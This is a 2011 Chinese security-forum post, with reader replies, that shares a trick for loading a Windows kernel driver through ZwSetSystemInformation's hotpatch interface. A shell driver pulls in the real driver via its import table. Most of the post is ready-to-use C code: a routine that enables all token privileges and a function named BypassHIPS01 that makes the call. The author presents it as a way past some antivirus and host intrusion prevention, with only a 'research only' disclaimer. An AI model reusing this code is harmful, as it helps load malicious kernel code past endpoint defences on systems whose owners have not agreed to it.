首页
论坛
专栏
课程

[分享]利用系统Hotpatch加载驱动的一种比较取巧的方法

2011-12-21 04:25 13010
cvcvxk
10

[分享]利用系统Hotpatch加载驱动的一种比较取巧的方法

2011-12-21 04:25
13010
其实没啥可讲,也没啥可说的,这代码同样的是很老的代码,只是一直没放的原因是为了保持互联网和谐,但是都快圣诞,还是放一下吧~
首先这是一个基于ZwSetSystemInformation 加载驱动的方法,
其次这是一个只被部分杀毒拦截的方法——别指望这个能过360,因为mj早知道这个~
然后说一下为啥是取巧,因为这是利用MmLoadSystemImage对驱动文件处理时,会自动加载并执行文件的导入表的其他驱动,于是你懂得。(具体参考 我那篇ZwLoadDriver的文章:http://bbs.pediy.com/showthread.php?t=142021)

最后上代码

//Jan 4 2005
//Enable specific privilege
BOOL EnableSpecificPrivilege(BOOL bEnable,LPCTSTR Name)
{
        BOOL bResult = FALSE;
        HANDLE hToken;
        TOKEN_PRIVILEGES TokenPrivileges;

        if(OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES,&hToken) == 0)
        {
                return FALSE;
        }

        TokenPrivileges.PrivilegeCount = 1;
        TokenPrivileges.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;
        bResult = LookupPrivilegeValue(NULL,Name,&TokenPrivileges.Privileges[0].Luid);
        if(!bResult)
        {
                CloseHandle(hToken);
                return FALSE;
        }

        bResult = AdjustTokenPrivileges(hToken,FALSE,&TokenPrivileges,sizeof(TOKEN_PRIVILEGES),NULL,NULL);
        if(GetLastError() != ERROR_SUCCESS || !bResult)
        {
                CloseHandle(hToken);
                return FALSE;
        }

        CloseHandle(hToken);
        return TRUE;
}

//Jan 4 2005
//Enable all privilege, return num of privileges successfully enabled
DWORD EnableAllPrivilege(BOOL bEnable)
{
        DWORD count=0; 
        ///
        count+=EnableSpecificPrivilege(bEnable,SE_ASSIGNPRIMARYTOKEN_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_AUDIT_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_BACKUP_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_CHANGE_NOTIFY_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_CREATE_PAGEFILE_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_CREATE_PERMANENT_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_CREATE_TOKEN_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_DEBUG_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_INC_BASE_PRIORITY_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_INCREASE_QUOTA_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_LOAD_DRIVER_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_LOCK_MEMORY_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_PROF_SINGLE_PROCESS_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_REMOTE_SHUTDOWN_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_RESTORE_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_SECURITY_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_SHUTDOWN_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_SYSTEM_ENVIRONMENT_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_SYSTEM_PROFILE_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_SYSTEMTIME_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_TAKE_OWNERSHIP_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_TCB_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_UNSOLICITED_INPUT_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_MACHINE_ACCOUNT_NAME);

        return count;
}
//Mar 7 2006
BOOL BypassHIPS01()
{
        
        struct {
                SYSTEM_HOTPATCH_CODE_INFORMATION shci;
                WCHAR KernelPath[MAX_PATH];
        } s;
        WCHAR FileName[MAX_PATH];
        WCHAR RealSysName[MAX_PATH];
        EnableAllPrivilege(TRUE);
        ZWSETSYSTEMINFORMATION pNtSetSystemInformation=(ZWSETSYSTEMINFORMATION)GetProcAddress(GetModuleHandle(_T("ntdll.dll")), "ZwSetSystemInformation");
        //LPTHREAD_START_ROUTINE pLdrHotPatchRoutine = (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(_T("ntdll.dll")), "LdrHotPatchRoutine");
        GetModuleFileNameW(NULL,FileName,MAX_PATH);
        (wcsrchr(FileName, L'\\'))[0] = L'\0';
        OutputDebugStringW(FileName);
        StringCbPrintfW(RealSysName,MAX_PATH,L"\\??\\%s\\HotpatchSys.sys",FileName);
        OutputDebugStringW(RealSysName);
        if(pNtSetSystemInformation)
        {
                s.shci.Flags = HOTP_USE_MODULE | HOTP_PATCH_APPLY|HOTP_KERNEL_MODULE;
                s.shci.InfoSize = sizeof(s);
                s.shci.KernelInfo.NameOffset=(WORD)((ULONG_PTR)s.KernelPath -(ULONG_PTR)&s.shci);
                s.shci.KernelInfo.NameLegth=2*wcslen(RealSysName);
                StringCbCopyW(s.KernelPath,MAX_PATH,RealSysName);
                OutputDebugStringW(s.KernelPath);
                //_tprintf(_T("Flags:%x,Size:%x,Offset:%x,NameLegth:%x\r\n"),s.shci.Flags,s.shci.InfoSize,s.shci.KernelInfo.NameOffset,s.shci.KernelInfo.NameLegth);
                //s.shci.UserModeInfo.NameOffset = (WORD)((ULONG_PTR)s.SourceName -(ULONG_PTR)&s.shci);
                //s.shci.UserModeInfo.NameLegth = sizeof(SOURCE_NAME)-sizeof(WCHAR);
                //s.shci.UserModeInfo.TargetNameOffset = (WORD)((ULONG_PTR)s.TargetName -(ULONG_PTR)&s.shci);
                //s.shci.UserModeInfo.TargetNameLegth = sizeof(TARGET_NAME)-sizeof(WCHAR);
                //s.shci.UserModeInfo.PatchingFinished = FALSE;
                //lstrcpynW(s.SourceName, SOURCE_NAME, sizeof(s.SourceName));
                //lstrcpynW(s.TargetName, TARGET_NAME, sizeof(s.TargetName));
               // hThread = CreateThread(NULL, 0, pLdrHotPatchRoutine, &s, 0, NULL);
               // WaitForSingleObject(hThread, INFINITE);
               // CloseHandle(hThread);
                NTSTATUS x = pNtSetSystemInformation(SystemHotpatchInformation,&s,sizeof(s));
                if (x==STATUS_INVALID_IMAGE_FORMAT)
                {
                        return TRUE;
                }
        }
        return FALSE;
}

加载的hotpatch.sys其实是一个空壳真正的驱动是由它的导入表导入的某个内核动态库驱动~
需要的hotpatch定义用的头文件在本帖的附件里给出~
HotPatch.rar

严重声明:本帖给出的代码仅供研究学习之用,如果用在他途,各种后果与本人无关。

欢迎交流,QQ群:171797360

[推荐]看雪企服平台,提供安全分析、定制项目开发、APP等级保护、渗透测试等安全服务!

上传的附件:
上一主题 下一主题
最新回复 (22)
MRCDG 2011-12-21 08:28
2
0
沙发,前排留名
pigdefeet 2011-12-21 09:09
3
0
马扎凑热闹马扎凑热闹
xss 4 2011-12-21 09:10
4
0
多谢V大给菜鸟科普.............................
windowsa 2011-12-21 09:12
5
0
楼主就是经常搞免杀和D的那位?
gezz 2011-12-21 10:03
6
0
果断前排占老V广告位,老V神作2005年~~
Fido 2011-12-21 10:18
7
0
膜拜啊.................................
痞子辉 1 2011-12-21 10:28
8
0
膜拜啊.................................
fhurricane 1 2011-12-21 10:31
9
0
来膜拜老V了!!!
smilediy 2011-12-21 10:37
10
0
06年的代码
skypismire 1 2011-12-21 10:39
11
0
长见识阿.
cvcvxk 10 2011-12-21 11:05
12
0
话说,我从来不搞免杀和D。
我的职业是超自然学研究人员。
zuoyefeng 2011-12-21 11:25
13
0
顶老v爆鸟~~~~~~~~~
miaoling 2011-12-21 11:30
14
0
果断过来膜拜……
liein 2011-12-21 12:23
15
0
终于有人公布了...... 顶 ...
cvcvxk 10 2011-12-21 14:32
16
0
不是终于,而是圣诞节与新年的提前爆料
byexe 2011-12-21 14:43
17
0
占坑  大家占坑
yanghh 2011-12-21 15:16
18
0
好东西 顶。。。
wowocock 1 2011-12-22 14:20
19
0
该把老V抓起来。
mszjk 2011-12-23 03:36
20
0
赶来膜拜...
djxh 2011-12-23 05:18
21
0
学习123456
kmsmxpro 2011-12-23 08:37
22
0
好东西 顶。。。
ylautyboy 2012-2-23 15:37
23
0
膜拜啊.................................
游客
登录 | 注册 方可回帖
返回